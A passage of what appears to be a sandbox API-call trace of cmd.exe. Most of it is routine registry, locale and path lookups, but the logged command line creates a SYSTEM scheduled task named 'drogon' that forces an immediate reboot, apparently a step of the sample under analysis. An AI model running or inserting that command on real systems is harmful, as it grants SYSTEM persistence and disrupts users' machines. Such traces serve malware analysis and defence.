(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0017.942] GetEnvironmentStringsW () returned 0x454060* [0017.942] FreeEnvironmentStringsW (penv=0x454060) returned 1 [0017.942] GetEnvironmentStringsW () returned 0x454060* [0017.942] FreeEnvironmentStringsW (penv=0x454060) returned 1 [0017.942] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe7bc | out: phkResult=0x3fe7bc*=0x68) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x0, lpData=0x3fe7c8*=0x0, lpcbData=0x3fe7c0*=0x1000) returned 0x2 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x1, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x0, lpData=0x3fe7c8*=0x1, lpcbData=0x3fe7c0*=0x1000) returned 0x2 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x0, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x40, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x40, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x0, lpData=0x3fe7c8*=0x40, lpcbData=0x3fe7c0*=0x1000) returned 0x2 [0017.942] RegCloseKey (hKey=0x68) returned 0x0 [0017.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe7bc | out: phkResult=0x3fe7bc*=0x68) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x0, lpData=0x3fe7c8*=0x40, lpcbData=0x3fe7c0*=0x1000) returned 0x2 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x1, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x0, lpData=0x3fe7c8*=0x1, lpcbData=0x3fe7c0*=0x1000) returned 0x2 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x0, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x9, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x4, lpData=0x3fe7c8*=0x9, lpcbData=0x3fe7c0*=0x4) returned 0x0 [0017.942] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe7c4, lpData=0x3fe7c8, lpcbData=0x3fe7c0*=0x1000 | out: lpType=0x3fe7c4*=0x0, lpData=0x3fe7c8*=0x9, lpcbData=0x3fe7c0*=0x1000) returned 0x2 [0017.943] RegCloseKey (hKey=0x68) returned 0x0 [0017.943] time (in: timer=0x0 | out: timer=0x0) returned 0x59f0aadb [0017.943] srand (_Seed=0x59f0aadb) [0017.943] GetCommandLineW () returned="/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00" [0017.943] GetCommandLineW () returned="/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00" [0017.943] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.943] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x454068, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0017.943] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0017.943] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0017.943] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0017.943] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0017.943] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0017.943] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0017.943] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0017.943] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0017.943] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0017.943] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0017.943] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0017.943] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0017.943] GetEnvironmentStringsW () returned 0x454278* [0017.943] FreeEnvironmentStringsW (penv=0x454278) returned 1 [0017.943] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.943] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0017.943] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0017.943] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0017.943] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0017.943] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0017.943] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0017.943] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0017.943] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0017.943] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0017.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ff588 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ff588, lpFilePart=0x3ff584 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ff584*="Desktop") returned 0x25 [0017.944] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0017.944] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff304 | out: lpFindFileData=0x3ff304) returned 0x453ee0 [0017.944] FindClose (in: hFindFile=0x453ee0 | out: hFindFile=0x453ee0) returned 1 [0017.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ff304 | out: lpFindFileData=0x3ff304) returned 0x453ee0 [0017.944] FindClose (in: hFindFile=0x453ee0 | out: hFindFile=0x453ee0) returned 1 [0017.944] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0017.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ff304 | out: lpFindFileData=0x3ff304) returned 0x453ee0 [0017.944] FindClose (in: hFindFile=0x453ee0 | out: hFindFile=0x453ee0) returned 1 [0017.944] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0017.944] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0017.944] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.944] GetEnvironmentStringsW () returned 0x4560e8* [0017.944] FreeEnvironmentStringsW (penv=0x4560e8) returned 1 [0017.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.945] GetConsoleOutputCP () returned 0x1b5 [0017.945] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1 [0017.945] GetUserDefaultLCID () returned 0x409 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a5b4950, cchData=8 | out: lpLCData=":") returned 2 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ff6c8, cchData=128 | out: lpLCData="0") returned 2 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ff6c8, cchData=128 | out: lpLCData="0") returned 2 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ff6c8, cchData=128 | out: lpLCData="1") returned 2 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5b4940, cchData=8 | out: lpLCData="/") returned 2 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0017.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0017.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0017.946] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a5b4930, cchData=8 | out: lpLCData=".") returned 2 [0017.946] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5b4920, cchData=8 | out: lpLCData=",") returned 2 [0017.946] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0017.946] GetConsoleTitleW (in: lpConsoleTitle=0x454eb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0017.959] GetProcAddress (hModule=0x76600000, lpProcName="CopyFileExW") returned 0x76633b92 [0017.959] GetProcAddress (hModule=0x76600000, lpProcName="IsDebuggerPresent") returned 0x76614a5d [0017.959] GetProcAddress (hModule=0x76600000, lpProcName="SetConsoleInputExeNameW") returned 0x7662a79d [0017.959] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0017.959] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0017.959] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0017.959] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0017.959] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0017.959] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0017.959] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0017.961] GetConsoleTitleW (in: lpConsoleTitle=0x3ff3c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.962] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0017.962] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0017.962] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0017.962] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0017.962] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0017.962] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0017.962] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0017.962] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0017.962] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0017.962] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0017.962] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0017.962] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0017.962] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0017.962] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0017.962] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0017.962] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0017.962] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0017.962] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0017.962] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0017.962] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0017.962] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0017.962] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0017.962] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0017.962] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0017.962] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0017.962] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0017.962] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0017.962] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0017.962] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0017.962] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0017.962] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0017.962] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0017.962] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0017.962] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0017.962] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0017.962] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0017.962] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0017.962] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0017.962] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0017.962] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0017.962] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0017.962] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0017.962] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0017.963] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0017.963] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0017.963] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0017.963] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0017.963] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0017.963] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0017.963] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0017.963] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0017.963] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0017.963] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0017.963] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0017.963] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0017.963] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0017.963] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0017.963] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0017.963] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0017.963] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0017.963] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0017.963] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0017.963] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0017.963] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0017.963] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0017.963] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0017.963] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0017.963] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0017.963] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0017.963] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0017.963] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0017.963] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0017.963] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0017.963] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0017.963] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0017.963] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0017.963] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0017.963] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0017.963] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0017.963] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0017.964] SetErrorMode (uMode=0x0) returned 0x8001 [0017.964] SetErrorMode (uMode=0x1) returned 0x0 [0017.964] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4407f8, lpFilePart=0x3feee0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3feee0*="Desktop") returned 0x25 [0017.964] SetErrorMode (uMode=0x8001) returned 0x1 [0017.964] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0017.964] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0017.967] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0017.968] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0017.968] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x3fec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fec5c) returned 0xffffffff [0017.968] GetLastError () returned 0x2 [0017.968] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks", fInfoLevelId=0x1, lpFindFileData=0x3fec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fec5c) returned 0xffffffff [0017.968] GetLastError () returned 0x2 [0017.968] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0017.968] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x3fec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fec5c) returned 0x455590 [0017.968] FindClose (in: hFindFile=0x455590 | out: hFindFile=0x455590) returned 1 [0017.968] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x3fec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fec5c) returned 0xffffffff [0017.968] GetLastError () returned 0x2 [0017.968] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x3fec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fec5c) returned 0x455590 [0017.968] FindClose (in: hFindFile=0x455590 | out: hFindFile=0x455590) returned 1 [0017.968] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0017.968] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0017.968] GetConsoleTitleW (in: lpConsoleTitle=0x3ff154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.969] InitializeProcThreadAttributeList (in: lpAttributeList=0x3fefdc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ff0a4 | out: lpAttributeList=0x3fefdc, lpSize=0x3ff0a4) returned 1 [0017.969] UpdateProcThreadAttribute (in: lpAttributeList=0x3fefdc, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ff09c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3fefdc, lpPreviousValue=0x0) returned 1 [0017.969] GetStartupInfoW (in: lpStartupInfo=0x3fef98 | out: lpStartupInfo=0x3fef98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0017.969] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0017.969] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0017.971] 